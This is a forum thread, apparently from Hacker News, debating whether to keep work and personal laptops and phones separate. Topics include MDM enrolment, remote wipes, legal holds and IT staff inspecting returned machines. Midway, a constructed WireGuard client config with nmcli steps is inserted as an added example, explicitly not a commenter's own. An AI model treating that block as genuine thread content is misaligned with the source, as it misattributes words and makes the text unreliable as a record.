What's the point of having phones thinner than razor blades, if not to facilitate carrying two of them? I think I could stack 5 or more phones and they'd still easily fit in my pocket.
I think most of us are in the situation that our employers don’t explicitly want us to have Slack/Teams on our phones. They want us to be available.
Slack/Teams on my (personal) phone means I can run an errand in the middle of the day and still be available. I’m happy to use my personal device for it. The alternative is having much less flexibility.
If my employer expected me to be available outside office hours or when not at my computer it would be a completely different story. Like if I was on call. Then I’d demand they pay for my smartphone too.
As someone who worked before there were smartphones--indeed, before there were mainstream cellphones and laptops--I'm acutely aware of just how "chained to your desk" you used to be in that, if you weren't there, you couldn't be reached. Of course, you were sometimes in meetings. But, for the most part, you really needed to be sitting at your desk most of the day if only because someone might call you with a question. (Yes, a sales rep calling me on the phone as a product manager was the norm.)
Shouldn't the thing _actually be_ "if they want you to have Slack on your phone, they should pay you for availability during off hours"? The phone buying is basically a one-time cost from their perspective.
I've got a wireless mouse and keyboard that support multiple devices, so I don't even need to swap the plug. To use my personal computer I just switch the monitor input and the mode on the mouse/keyboard.
> HARD disagree. Use a separate personal machine and a KVM switch or hub/dock.
This! Especially with Thunderbolt being widely available on high end machines, switching between computers is easier than it ever was. I have a work Windows machine and a personal Macbook. Switching from work to personal system is a matter of unplugging and changing a single cable.
FWIW, with JAMF, your employer can ship it straight from Apple to your door, and still get their MDM all over it the second it connects to the internet the 1st time.
I understand this sort of thing pisses people off but Windows Autopilot and automatic enrolment into Intune has been an incredible help this last year.
Where I work we managed to ship thousands of laptops to students' homes from the manufacturers during lockdown, but still ensured that they had the correct E-Safety software and configurations on them when they turned them on for the first time.
> FWIW, with JAMF, your employer can ship it straight from Apple to your door, and still get their MDM all over it the second it connects to the internet the 1st time.
You buy the hardware through an Apple business portal and Apple will register the machine to your MDM server. The first thing the laptop does when being set up is to check if it should download MDM configuration.
We do this for all Macs and iPhones for our employees, we buy them directly through our Apple business portal and it all automatically registers to our JAMF account.
Any technical resource/paper with the details on this?
This seems ripe for exploiting for nefarious purposes. With Apple having built it, all it takes is one court order targeting a serial# and it auto-installs full remote control spyware on that mac?
Do you charge your company for desk space at your house?
It's not being talked about much, but since companies are okay paying landlords billions, they seem to be shy to pay their employees for use of their homes as offices.
> Do you charge your company for desk space at your house?
Do you charge your company for your commute to the office?
I can see where you are coming from, but charging the company for office space in your home is a bit over the top IMO - paying for the setup should be sufficient. Additionally, working from home comes with time and money savings for you (unless you answered "yes" to the question above), so it's not like they're using your space with only disadvantages to you. Lastly, renting out the space in your office might come with further drawbacks, as the company could demand more control of the space it is paying for.
> Do you charge your company for your commute to the office?
Travel expenses for your commute are pretty standard. My employer offers either a per-kilometer amount (if you travel by car) or a train subscription, if you travel by public transport.
During the pandemic I had colleagues sitting in their garage for one full year. There was no other place to be. Other younger colleagues had studios where they said when they sit up straight in their bed they are at the 'office'. So to me this is a discussion we should have.
In Australia and Germany there are tax deductions for utilities as far as I know.
> Do you charge your company for your commute to the office?
Companies tend to pay people for their commute here in Belgium. This can take the form of paying your train pass, a reimbursement per kilometre travelled or even a company car + fuel card.
That doesn't cover the hours spent travelling, of course.
When I had a sizable house in an affordable area using a home office felt like a blessing. After moving closer to the office and renting in an expensive area this past year has been... difficult. I'm essentially paying 800/month in rent for the space my wife and I have been working out of.
I can weather this as a temporary pandemic measure but for some of my early-career colleagues it's a very serious burden.
I agree. But I think we need to look at these things even further.
It's sensible to separate the two in principle, but the arguments forwarded by the author seem to ignore the actual substance of the issue here: that people are not machines that can genuinely do "work" and "play" separately and that employers should not have that sort of power in the first place.
The world we should strive to build is not one where security issues are entirely removed from the equation or where employees become perfectly aligned with their employer's business needs, but one where most individuals of the society lead healthy, fulfilling, meaningful lives.
As such, it's not the employees that should remove their humanity from the workplace, it's the workplace - the employer - that should take (many) steps back and allow people to be people.
I understand that visual arts or being a writer are considered different businesses than IT, that's pretty common sense, but I guess if you're doing a website on company property where their business is embedded systems this could be qualified as the same business (IT)?
I recently switched jobs. When I put in notice at my previous employer there was some sort of miscommunication with IT about my last day and I was shut out 2 days early, before I had a chance to wipe everything or even log out of my personal stuff (in their own chrome instance). They were not willing to undo it, but assured me everything would be instantly wiped once they received it. Couple days later I decide to check my google accounts for some other purpose and see an active session in the city where I mailed back my machine to. Same with a few other accounts. Was not thrilled with that.
I use an encrypted linux VM with a VPN on my company Mac for anything personal like listening to music or checking email. At least if they were to suddenly lock me out of my Mac, the personal data would be encrypted. If they had a problem with me doing this, I just delete a single disk image file and everything is gone.
I wish there was a way to do that natively with Firefox, whereby a whole profile is encrypted and password protected. Most personal things I do on work PC are through the browser, so if the profile were protected, it would be problem-solved.
I'm using VMware and it allows for encrypting the disk image and locking the settings behind a password. Within the VM, I'm using disk encryption so that the filesystem is secure. And then I run my own WireGuard VPN and I've set up network manager to auto connect so my traffic traverses the VPN.
I'm sure there are better ways to set up the VPN but it works for what I wanted it for.
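A WireGuard client configuration of the kind the comment describes, as an added example that is not the commenter's own config: it sends all of the personal VM's traffic through a self-hosted WireGuard server. The interface name wg0, the 10.8.0.0/24 tunnel addresses, the endpoint hostname and the key placeholders are assumptions.

```ini
# Constructed example: /etc/wireguard/wg0.conf inside the personal VM.
# Placeholder keys and addresses; generate real keys with `wg genkey | tee priv | wg pubkey`.
[Interface]
# Key pair that identifies this VM to the server (never reuse the server's key).
PrivateKey = <VM_PRIVATE_KEY_PLACEHOLDER>
# Tunnel address of the VM; the server side holds 10.8.0.1 (assumed layout).
Address = 10.8.0.2/32
# Resolve names over the tunnel too, otherwise DNS queries still leave in clear
# on the host's network even though the rest of the traffic is tunnelled.
DNS = 10.8.0.1

[Peer]
# Public key of your own WireGuard server.
PublicKey = <SERVER_PUBLIC_KEY_PLACEHOLDER>
# Assumed hostname/port of the server; the only destination the VM talks to directly.
Endpoint = vpn.example.net:51820
# 0.0.0.0/0 and ::/0 make the tunnel the default route for both IPv4 and IPv6,
# so nothing from the VM is routed over the host network outside the tunnel
# while the interface is up.
AllowedIPs = 0.0.0.0/0, ::/0
# Keeps the UDP mapping alive behind the host's NAT so the server can reach back.
PersistentKeepalive = 25
```

To get the auto-connect behaviour with NetworkManager, import the file with `nmcli connection import type wireguard file wg0.conf` and confirm `connection.autoconnect yes` on the resulting connection. While the tunnel is down its routes are not installed and the VM's traffic takes the ordinary path, so check `wg show` after boot rather than assuming.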
Oh wow. So they aren’t encrypting the devices or they have a master key? We use Apple laptops at my work and when somehow I messed up changing my login credentials, the only recourse was to wipe the device because it couldn’t be decrypted.
Jamf, for instance, lets me configure a policy like “use FileVault to encrypt all laptops, and also escrow an encryption key”. I can decrypt any encrypted work laptops if needed.
This is such critical advice, particularly if you work for a company that does remote hardware management.
You could be fired tomorrow, and your access to your hardware revoked instantly. Apple devices, in particular, allow IT to remote lock your laptop. Whatever you had stored on the drive is lost to you, available to your employer, and you can't do anything about it.
Saying "instantly" is underselling it. It literally happens before you are fired. IT will have disabled your ability to access files before you have been informed it is happening.
If you got the laptop in a sealed Apple box (purchased by employer), and set up macOS yourself, created your own admin user and everything, does this remote access still apply?
I manage hundreds of Macs. Just wanted to add that these management profiles don't say much about what you can and can't do and what your company can do. You have to go through each of them to see what they do (the management one is just the master one, there will be tons more which specify exactly what is restricted and/or enforced). Apple is very good at privacy protection, asking the user for permission even on managed machines, which can be bypassed with certain profiles but it's pretty tough to do. I personally take this as a sign to think long and hard about whether I really should.
Co-usage is just a thing these days. A little trust in your employees is also important. Usually these profiles just mandate some basics like password complexity, disk encryption and they set standard settings like WiFi and printers so you don't have to bother figuring all that stuff out. And it will install applications you need and security stuff.
And don't forget, a password complexity profile on a Mac will apply to all accounts created on it. Even ones created by the user. Many things work like this, on a machine level. It's more about establishing a security baseline than tying the users' hands.
It means your employer has a very low level of security and you should be genuinely concerned about any personal or financial information you gave them during your hiring.
That is like arguing "not all cars need seatbelts." You might disagree on how many airbags or crash avoidance widgets a car needs, but the vast majority of the industry agrees that seatbelts are a requirement.
Every single FAAMG company runs managed endpoints. I'm not sure why you are arguing that companies having no control over their hardware is somehow a security feature?
Yes, it does. The employer has registered in front of Apple the serial number and Apple considers the device theirs. MDM on an employer's laptop allows them full control. If the device is owned by the user, then the MDM is more limited.
It's actually the vendor that registers Macs. Only iOS devices can be registered to Apple DEP manually. Macs can't, only the vendor can do so, whether it's Apple or whoever else.
It would still need on-device authorisation to opt into MDM though. I can't just give Apple your serial number and tell them to start pushing updates to your device, can I?
At the time of purchase, the vendor knows which machines the employer buys and assigns them the relevant privileges. When the machine is initially opened, it connects to Apple and is provided with the address of its mothership server. The MDM server then instructs the machine what to download and how to configure it. The user just has to unbox the machine and nothing else. This is convenient because it allows for downloading multiple apps, installation and configuration of certificates, setting password policies and many other actions that users are really prone to mess up, and that waste lots of sysadmin time if done manually one by one.
If the user owns the machine, then there must be authorization and the MDM has much more limited, privacy-preserving scope.
That's really surprising. I suppose it makes sense if it happens at the time of setting up the machine, and an explicit notice is given to the end user. That should circumvent any privacy and security issues.
I think they are asking if you could social engineer access to someone's laptop by knowing their serial and calling enterprise support. Seems to me like you could.
This entirely depends on what you do from that point forward. Are you using a VPN provided by your employer? Are you installing any screen sharing or collaboration apps for work? You'll need to understand what each of these are capable of in order to fully understand your exposure.
Yes, agreed. Apple does a good job letting you know what your company has access to, and if you use iCloud / Personal GMail, your stuff stays with you after you leave.
Chromebooks provide separate logins for personal and Workspace/GSuite accounts.
As for what happens if your Chromebook is stolen and you've not selected the option to lock it when the lid is closed, Workspace/GSuite accounts can be remote wiped, personal ones cannot. Perhaps with the upcoming Workspace Individual plan, remote wiping of personal accounts will be possible too.
I live in Australia, which generally has decent (but slowly eroding) workplace protections. But I managed to get fired and walked out of the building with zero notice. So I would not count on this even in a country with traditionally strong labour laws.
That’s a non sequitur. Access can be revoked on a machine with something like an MDM system the next time it gets network access, whether you’re fired or not.
Certainly if a machine is stolen I’d expect it to be remotely wiped. Same with a phone.
If you have hardware that isn’t under an mdm system though that’s different.
Even if a company can't fire you immediately, they can certainly revoke your access and remove all of your responsibilities while they process your termination.
I would say that not allowing a company to fire someone immediately, say, if they're looking at porn on their work computer during work time in front of the entire work office, is unreasonable.
There are many cases where this is good advice--and certainly if you're the director of the CIA. There are of course additional reasons, including company policy and as peer comment says side projects, to keep personal and work devices separate. But I also don't think one-size fits all rules apply. I'm not going to carry two laptops when I travel.
Did you consider booting off an external drive? Macs work really well in this scenario. Windows is notoriously bad at booting off USB (though I'm not sure if this is still the case). But Macs can do it really well. Linux too.
I used to do this in earlier times when personal use was still a very dark thing (in our company it has since become normal - at least web browser stuff). In the days I carried a ThinkPad T42 I would just slip the HDD caddy out and stick in my own at night in the hotel.
Later on I ran my own macOS on a company mac from a USB 3 HDD. Just hold option when booting. You can even encrypt both to secure them from each other.
Luckily these days I don't have to bother with any of that anymore. But they weren't too bad options as long as you don't need both environments at the same time.
On Windows systems with BitLocker, booting off an external drive (or shoot, even opening the BIOS to look and see how much RAM was installed, as happened to me once) will often trip the BitLocker recovery prompt, which means you have to call IT and ask for the magic 48 character password to get back into your laptop, to which they inevitably ask "why did that come up".
Yeah, the carrying two laptops part is also my issue. Of course, I am well within my rights to not take my work laptop with me when I go anywhere and if a disaster strikes, I can just tell my manager to sod off - but it's just easier to take the work laptop and do my YouTube watching on it.
(I'm technically not on call but in practice it's messier)
Not the most environmentally friendly and may be against company security policies in certain places, but if you’re going traveling you could leave the work laptop plugged in and remote if disaster strikes (part of the point of this is that it shouldn’t be routine).
As for me, I’ve done the two-laptop thing when traveling for 5 years or so. It’s actually worth it for other reasons too - having your only computer have a hardware failure or be stolen in the jungle is no fun. If both are of the same make you could even boot one’s drive off the other in a pinch.
For all the “what about X?” questions in this thread... you will figure it out easier and faster than you think once you force yourself to change habits.
I love the shocked Pikachu face when I show up at someone's desk, let them know their laptop is part of an ongoing investigation, and IT will be by soon to give them a new one.
How does that work these days when people no longer work at their desk in the office?
Just one of the many ways that dual-use is becoming more common. And OSes are increasing their abilities for it too. Mobile OSes are already great at separation. Windows is coming along slowly with Windows Information Protection and Azure Information Protection. Mac has user enrolment but it's in its infancy, sadly.
Your company's lawyers or personnel security people call you and say your devices are being placed on a legal hold. Don’t delete anything or you might have to deal with the courts. The large MegaCorp I work for had some training that included stuff about lawsuits.
Ok yeah we do get that sometimes in our company but it's always triggered by external causes (some supplier being unhappy about a deal or something, they never tell me the full story). So it only affects people dealing with external parties. And always in the US, never seen it anywhere else. Though it seems to be increasingly prevalent there.
They are using company owned assets, or devices that the company has an interest in. For example one of my former employers paid a percentage of your monthly cell phone bill as part of the BYOD program, which also involved you agreeing to turn over and unlock the device on request.
You can also be compelled by the courts to surrender a device that holds information relevant to a civil or criminal matter. For example sending text messages to a coworker on your personal phone about how you are going to coordinate your efforts to block someone's promotion.
Unless you actually have rogue employees I'm guessing you'll be able to do this once or twice before you get told to stop making people lose an afternoon or even entire days of productive work because of bullshit like that.
I actually believe that certain government officials (including the director of the CIA) are asked not to have personal cellphones because that could reveal their location. IIRC, Obama needed to have some special technical work done so he could use an iPhone.
At all the jobs I've had, any code that I write using company-owned resources, even if done on my time, the company asserts ownership over. I like to work on open source projects on the weekends, and so that absolutely requires a non-work computer.
I mentioned elsewhere, but I run an encrypted linux VM for anything personal and run all its network traffic through a VPN. I think it's a pretty good compromise between mixing work/personal, and carrying two laptops.
Hotel WiFi can be pretty awful. To be honest, this isn't a problem for me. I don't separate usage pretty much at all. I'm not sure what I would do if it were a bigger deal.
This was part of the reason I bought a PinePhone. It's not for everyone but it's about as powerful as my personal laptop (yes I know, it's 10 years old though.) I've carried work+personal laptops before and that can get heavy enough to start hurting my back so I generally avoid it now.
Many years before I left my company, I purchased my own equipment for personal use. I actually had better equipment than that provided by my employer.
They monitored the living bejeezus out of my work equipment, and wouldn't let personal equipment (including phones) connect to the corporate network.
It was pretty overboard, but my company was seriously paranoid. It actually caused problems. For example, we wrote optimized C++, and optimizing on a monitored system is...difficult; especially with some of the custom gnarlyware we got from companies like Intel.
It also meant that I never worried about mixing my personal work with company work. If I had personal equipment at work, I would use 4G/hotspot. Not ideal (so I didn't really do anything more than check emails at work). It also allowed me to get to some of the banned sites (the company had a nasty habit of banning exactly the kinds of sites that optimizers like to read).
Another benefit was that I left my work equipment at work, so I couldn't easily be roped into doing out-of-band work. I had a great excuse.
It was annoying, but fine with me. I think the company went way overboard in their paranoia, but it was their company, and they got to set the rules. I have never had any interest in causing issues with them, so I was careful not to do anything that would step on their toes. They pretty much returned the favor.
I laughed reading this article. It draws a very broad conclusion of "No personal use" based on a straw man story of a cleared person (wait for it) viewing "high risk porn sites" on his work laptop. Yes, there's an argument for not engaging in NSFW activities on employer assets or being extra cautious when you hold a security clearance. There's also a big difference between that and, say, posting on HN which I'm doing right now. It's shades of gray based on individual circumstances.
Nitpick: Deutch had two Macintosh Desktop computers at home (one in Maryland and one in Belmont). He did also have a laptop (marked UNCLASSIFIED) that was found to have classified data on it, but it's not clear that this was used by his family.
In addition, he had PCMCIA cards (this was before thumb drives) that contained classified data and were used in the unclassified desktops and/or laptops.
Anec-tangent: when I left a start-up, I turned in the company laptop. Then when I asked if I could buy it back (since it was nicer than my personal laptop), they just gave it to me for free. That was a really nice and totally unexpected gesture.
Later I gave that laptop to someone to learn to code on and now they're a full-time software engineer.
There's a lot of "one device versus two device" discussions here. I have a work laptop and a personal laptop that I use carefully to try and keep things separate. But, this means I'm now ~doubling the environmental impact of electronic devices (impact of production, disposal). So there's tension, in my mind, between the public/private work separation and minimizing the damage I'm doing to the environment.
In all fairness, I suspect me buying 2 laptops every 3-4 years instead of one laptop over the same period is a small environmental impact compared to other things (air travel, dietary choices). But it also seems like that's not a reason for me to ignore its impact. And the aggregate cost of many people having 2 laptops instead of 1 is probably worth considering.
I thought about ways to only have one device (running my personal "machine" as a VM on my work laptop or vice versa) but couldn't come up with anything cleanly satisfactory.
I think the environmental impact is overstated. There's a healthy second hand market that thrives because of companies buying laptops and eventually selling them. I've gotten plenty of great laptops at great discounted prices over the years that probably wouldn't be possible otherwise.
I remember when advice to not use company/official email for personal correspondence was considered a radical idea. Why would anyone need two email accounts?
Today I don't even want my personal phone connecting to corporate wifi. I work with these cats, I know how they think. So yes, two devices please.
Yet today phones have really excellent separation of personal and private data. Like Android Work Profile which basically is a small virtual phone inside your phone which is controlled by your employer, with the benefit that they can't look at any of your personal stuff and you can switch the whole thing off easily.
What did you find lacking with the VM approach? Have you considered or tried Qubes?
I’m a two-devicer. It increases the lifespan of my personal computer. And, more often than not, when I have left a job, employers have let me keep the old laptop, saving me from buying a new personal one. Honestly, are you really telling me you’d not own a personal computer? This sounds extremely trusting towards your employer, and puts you at a lot of risk depending on their policies and philosophy.
> What did you find lacking with the VM approach? Have you considered or tried Qubes?
It wasn't technical aspects of VMs per se, it was how to use them while still keeping things separate. If I had my personal machine as a VM on work baremetal, then in principle the personal VM wouldn't really be isolatable from work because if they had a keylogger then it would capture all input.
Edit: To be clear, I don't think that my employer uses keyloggers. But if the purpose was to keep personal and work separate, I didn't think a personal VM on a work machine really provided enough separation.
I didn't carefully investigate the reverse (having my work machine be a VM on top of a personal laptop) partly because MacOS is easiest for a work machine and I didn't want to mess around with trying to run MacOS in a VM.
> This sounds extremely trusting towards your employer, and puts you at a lot of risk depending on their policies and philosophy.
Obvious stupid uses of work laptops are beyond the pale, but I can see why someone would check their gmail from a work laptop (I'm posting this on my work laptop while my code compiles).
But one thing I found which is great is setting up my work and personal laptops next to each other on a laptop holder and doing everything through external monitors.
At my desk I have an adjustable laptop holder which holds my work and personal laptops. As they're both MacBooks, switching between my work and personal laptop is as simple as unplugging a couple of USB-C hubs, plugging them into the other laptop (the port is 1 inch away), and pulling out my other keyboard.
I do the same, but my USB hub holds keyboard, mouse, headphones, webcam, and a Wacom tablet. I have a large 4K monitor with an HDMI port going to each laptop, so I switch the monitor to read from the other input, move one USB cable, and I'm on the other laptop. No need even to switch keyboards - all the peripherals come along together.
I totally don't agree with his sentiment. And I manage 200,000 endpoints (computer and mobile).
This sentiment is a typical early 2000s mindset. It no longer works in this world where the line between business and private lives has blurred. And it wasn't just the pandemic that did that, this has been going on much longer.
Who wants to bring 2 laptops on a business trip? Or 2 phones for that matter? Computing is flexible in the age of the cloud. Mobile OSes are really good at separating personal and private data (think of Android's Work Profile and iOS's User Enrolment). Personal computers (either Mac or Windows) don't do this as well yet, but at least they're a hell of a lot more secure with everyone enforcing disk encryption now.
But we should remember that technology is there to serve us. If the tech can't deal with our increasing mix of private and business, we'll just have to make it better at that. Telling people not to do it just won't work.
I have one exception: Installing personal apps on a work computer is not really OK (unless the application has already been approved for work too). On mobile this is fine because of the more rigid separation.
PS: This is not just my opinion, it's the company's policy. We explicitly allow personal use (including apps) of mobile devices and most personal web usage on company laptops (though blocking malicious sites and stuff that's not really "business oriented" :) ). We do block some things like sideloading on mobile. Our devices are still secure because we enforce what's important (like decent passwords, full disk encryption). Our users are happier because we don't treat them like children. We're happier because we don't need to approve every taxi app anymore that a user would want to use on their work phone during a business trip. We just make sure their apps can't access the work apps. On mobile this works really well and on PC/Mac it's in the works.
It's a give and take. The early 2000's us-against-them BOFH total lockdown thing just doesn't fly anymore.
I know where you're coming from -- a key reason Blackberry failed in my view was that it was pitched to corporate IT and stopped people from doing anything on their device. This worked until the time when people in charge of actual important departments (not BOFHs) were getting iphones for their wives and kids, and wanted to be able to play angry birds on their phone. As that wasn't possible on a blackberry thanks to the IT policies, they said "fine, give me my mail on my iphone as I'm not carrying two phones"
In other organisations I'm sure those IT policies remain, but certainly in my part of my organisation I have a vanilla desktop, which replaced my vanilla laptop (haven't used it for 3 years). There's a corporate laptop (which is vanilla OSX with MDM), but more and more corporate services are available on web and I haven't used it for over a year.
I haven't paid for a mobile phone since I got my first work phone in 2006 (when phones were just for phone calls and sms). Most people in my organization that had phones back then (we tend to stay in the same company for life) are still one-device people.
So yes, from an organisation point of view, it's an antiquated mindset about control over worker drones.
In my experience, it's younger people who didn't join or get to a point where they had a work phone until after the smartphone revolution, that tend to carry two phones - a personal one and a work one.
> I have one exception: Installing personal apps on a work computer is not really OK (unless the application has already been approved for work too).
So the approved usage is more-or-less only the web browser? If the user can make do with that for their personal stuff, they would probably be happier with a tablet anyway. If they can't, then, well, they need two laptops.
Pretty much this. I have no problem with people watching Netflix or checking their email, or whatever. If it's not likely to create security problems for us - or at least, we already accept any security problems it has (as is the case for web browsing)... meh, why would I care?
Writing a personal doc on the work machine is a non-issue assuming a) it’s not sensitive in any way and b) it’s not getting you in trouble any other way.
Of course I do my personal coding on my own machine because of ownership/legal issues.
But replying with Gmail to my plumber or drawing my new kitchen using the CAD software on my work laptop or writing the invitations to the neighborhood barbecue if it’s more convenient? I’m just going to assume nothing bad will come of it.
Sensitive data, competing business, security risks, sure. But that’s pretty rare. Convenience easily trumps it.
I used the company laptop as a personal laptop for far too long as well until this year. Even when I considered leaving my job, I thought to myself "well crap, then I need to buy a new laptop first", so my ability to find a new job was tied to my current employer (imagine being fired and having to hand over my only laptop).
Separating work and personal machines also improved my WFH experience. When I shut down my work laptop, I put it in the drawer and the work day is done. Whatever happens, I will have to deal with it the next morning. And to avoid that, no deployments at about 1h before I leave so I don't get dragged into hot-fixes. If it's an urgent fix and it's end of day, I just stay a little longer, at least I have more control that way and no phone calls interrupting my evening.
My first ever office job was working for a local government, where one of the first things they told me when giving me a laptop was that the previous person in the position had been FOIAed and had to hand over the laptop to attorneys in the past so to be very careful about anything I did. This attitude has served me well in life.
I have a desktop at work that belongs to the company, but I used my personal laptop until not so long ago. Most other employees use their personal devices. I just opted for a desktop as a question of practicality, not having to carry around a laptop and connect it every day. I of course still use my laptop or a home desktop if I work from home.
If you have a good relationship with your boss you can do that; in the company we all manage our own devices, meaning that the operating system and stuff is decided and installed by whoever uses the computer (Linux, Windows, macOS, whatever you find more practical; that is also an advantage since we ensure you can develop a project on all platforms). Also we basically have admin access on everything personal and everything that is shared (shared computers in the office, network equipment, servers, etc).
I could not see working at a place where I have to pay attention to what I do on a particular device or else they will punish me. To me it doesn't really make sense; the computer that I'm using is mine as long as I use it, and of course if I change job that computer will be formatted and used by another person.
There is this concept but to me it only slows down work. If I have to do something personal related on the desktop at work I do it on the desktop, similarly if I'm at home and I have to do a fix on a production system I do that on my personal laptop, or I answer a Teams call from a coworker from my mobile phone.
> who in addition to accessing those university resources also visited several "high-risk" porn sites, one of which had placed cookies on the computer.
Get this, Charlie; get this, Charlie! It's cookies... Cookies! Oh, the humanity!
I get to see the crazy stuff people do on work laptops all the time. After letting one guy go for poor performance, a quick scan of his machine showed he was spending a majority of his time reading and commenting on incel message boards. Never mind the porn.
Never ever put anything personal on a work laptop. I recommend remote desktoping to your personal machine and doing all your personal stuff on that machine, so you get the best of both worlds.
I'm convinced the doorway to personal use on work hardware is the free printing. I still find half printed mapquest directions piling up in the copy room, in this day and age no less.
It only takes one time arriving in a new city by air at 11pm and your phone becoming non-functional prior to reaching the rental car to make one bring a redundant set of paper directions to get to the hotel.
My redundancy these days is having a cellular-equipped iPad.
It's saved my bacon a few times at this point. Basically a (large and unwieldy) cell phone I can pull out when my main driver falls dead.
Pro tip: install ride share apps on the tablet in advance, because in a serious UX fail, Uber and Lyft both want you to receive an SMS code to activate accounts. I was lucky that time, that getting my iPhone out of airplane mode at 1% battery wasn't enough to trigger forced shutdown.
Lyft doesn't even have a separate app, but Uber actually offers an iPad-native experience, but is unable to activate you without SMS. Which, along with standard voice calls, is the one thing a data plan associated with a phone number won't let you do except from the primary device.
> Pro tip: install ride share apps on the tablet in advance, because in a serious UX fail, Uber and Lyft both want you to receive an SMS code to activate accounts. I was lucky that time, that getting my iPhone out of airplane mode at 1% battery wasn't enough to trigger forced shutdown.
Uh-uh. Because you can just use a payphone to call one, right?
When I lost my phone in Madrid, I realized that I had no way to call a taxi, since I was staying in a residential area where you don't see taxis in the streets.
My Spanish was barely sufficient to explain my predicament, and I lucked out because a random convenience store clerk called me a taxi from his phone.
Which reminds me: in case you didn't notice, there are no more payphones. In 2001, I could walk up to one, and use one of them Yellow Books to do anything you could do on the phone.
Today, you need to have a smartphone to do many basic things.
Really? I live in Barcelona and there are always taxis ready for the hailing :) Uber and Lyft are not common here, though a local alternative, Cabify is. But whenever I use cabify I need to wait for ages for them to get there, and tens of taxis pass me during this time. So I only use them when I want the quiet of a nice car or when I want to know how much I'll pay in advance.
There are still some payphones here too, but most of them have been vandalised, that's true.
That very much depends on location and time. Smaller airports particularly, in off hours, may only have ten to twelve, which is not enough for that late plane that's coming in.
As part of my firewalling work from personal at my new job, I have been thinking "cellular iPad" for an ultra-portable personal machine that can also poke a personal server if needed.
(Well, that or Pi 400, but I worry how well the Pi 400 would hold up for travel, or about getting a hotel room with no easy HDMI on the TV)
Consider a AAA membership. Their maps are high-quality, frequently-updated, and entirely free. You can walk into any AAA on any day and get as many free maps as you can carry.
Not to mention the roadside assistance and towing coverage. I take long roadtrips too. The couple times that AAA has saved me make all the yearly dues worthwhile. E.g., once they arranged a 300-mile tow from a small coastal town back home; it took less than an hour to set up and didn’t cost me a dime. The alternative would have been paying next-day air freight on a Mercedes alternator and battery, and staying another 2 days to get the work done.
There are at least hundreds and probably thousands of locations. AAA is shockingly good. Maybe not shocking if you consider it's a 120-year-old nonprofit member services organization, but still: anyone who drives an auto in America is leaving serious value on the table if they aren't a member.
The bottom line is that if you're having a problem and you're in an automobile (doesn't have to be yours) AAA will do their best to help you solve that problem.
Unlimited, free, high-quality paper maps are just another perk. Walking in to a member branch and walking out with maps is just the beginning: a AAA employee will help you plan out a road trip, and make what's called a TripTik, which is a custom spiral-bound route map, with various sorts of amenities you can choose pointed out for you.
There are campgrounds as well. It's truly remarkable how much AAA offers.
They are very common--even tiny cities in the US will have an office somewhere. In fact, they're one of the few places to easily pick up properly formatted and valid international drivers licenses before you go overseas.
However, I would caution you that some of the benefits that used to come from being an AAA member have been severely curtailed. The towing benefit, in particular, now has quite a few restrictions on it.
First 'real' job I had I was a 20 something working in an office of mostly 40+ guys. (dot.com era had taken off and the company needed warm bodies)
As typical I became the guy who could help coworkers fix basic PC stuff quick. I didn't mind this as I got to know my coworkers and really just did simple things for just our small team.
One guy calls me over to help him with why he couldn't open some images on his computer. I fix the file association and ... yeah it's porn.
A little while later a guy brings in an old digital camera (back when they had some weird proprietary formats for images). Yeah, his daughters were taking pics of themselves standing by the highway flashing traffic as it goes by.
Nothing ever came of any of it, but here I was thinking loading a bunch of mp3s on my computer was a bit dicey....
I'm not sure people's attitudes have changed that much in the following decades.
Man, y’all are weird, reading browser history and shit. I would just remote wipe the computer and leave it be. That’s what my last employer did. They just Fleetsmithed it to zero and left me with the MacBook Pro.
Agreed, this is creepy, unnecessary, and possibly even damaging to whatever litigation is pending. (Assuming the litigation thing is even true, which I personally doubt.) Even if they do need an image of the drive, the people in IT shouldn’t be the ones pawing through it. That’s a job for a professional investigator or a lawyer. I ran an IT department for four years and if any of my staff did something like this, at the very least they’d be getting a closed door conversation about why this isn’t ok.
It’s pretty common practice to capture system images from returned employee equipment when they’re fired for cause (at least in the US). But it’s also pretty common for technicians to be forbidden from browsing those files without a very good reason.
Is it, though? I genuinely don’t think so. Performance stuff like this is usually documented via your HR stuff, the PIP etc.
“This guy was browsing incel forums from this time to this time”
Which court in what land uses that information?
Sounds kind of mythical, especially since I’m sure there’s an army of other people on idiot forums like that who are nonetheless performing fine.
EDIT: Okay, you guys hit me with sufficient downvotes that I’m rate limited so I know the predominant view is different.
Fine. I’m not a lawyer, but I’ll tell you this. If some rando IT dude is going through folks’ computers after they quit and I find out, I am quitting your company and telling everyone. I have never done that to anyone reporting to me and no company has ever done that to me. I can’t believe you’d accept these work conditions. Wild.
It makes sense if you think you're likely to have to defend the decision in court. For instance, I've worked on a team where a guy was fired for performance reasons that were obvious to all of us, but he sued and claimed it was discrimination. HR had known of a performance problem and the process was documented, but if the trustworthiness of the manager who gave them all that information is cast in doubt, could they really defend it quickly and decisively in court? We all had to be deposed. Imagine if it became a lengthy court case. I imagine it would be nice for the company to have a paper trail of convincing evidence of a performance problem. A timeline of significant, non-work web browsing during work hours on work machines would do the trick, and protect the rest of the team and the company.
That said, I agree with the commenters that I wouldn't want to work somewhere that did this as a matter of routine. I always have my work laptop encrypted with a key only I know and I have not (yet) been forced to give work root access for management. I'm always confident handing in my laptop that they couldn't find anything even if there was something.
>Fine. I’m not a lawyer, but I’ll tell you this. If some rando IT dude is going through folks’ computers after they quit and I find out, I am quitting your company and telling everyone. I have never done that to anyone reporting to me and no company has ever done that to me. I can’t believe you’d accept these work conditions. Wild.
At every large company I've worked at or heard of, it's pretty much assumed that IT may monitor everything you do on their machine. Everyone knew this. Which is why you don't use the company laptop for personal use.
IT may have the legal right and often the technical ability to monitor any activity on work computers.
But it is stupid to allow any old IT staff to do so, and this thread is a good illustration of why: because most IT staff do not have the discipline or smarts to keep what they learn sufficiently confidential. Allowing IT staff to browse the files of other staff at will can lead to other HR problems such as harassment or even blackmail, or loss of corporate reputation if people post embarrassing stuff in, say, a public HN thread.
The ability should be exercised only under the supervision of a lawyer, which limits bad behavior and creates attorney-client privilege for discussions of what might be found.
I worked at a place that did have good 'secrecy' around most monitoring. While I was one of three people outside of Infosec that managed to find out that someone was let go because they were caught exfiltrating client/employee PIFI... I'm pretty sure nobody who was possibly compromised got informed.
This was a place that was so concerned with image that the handbook was about as strict as what my Sister had to deal with when teaching at a Catholic school. Image was everything to them.
Is it the same in the EU? If I read the law correctly I understood they need a good reason to monitor and they definitely need to notify you and ask for consent.
I have been using my work laptop quite heavily for personal use and I would prefer not to stop honestly.
I believe my intentions are pure and to provide value, I understand the world is not perfect, but I would not want to work for an employer that needed to monitor me.
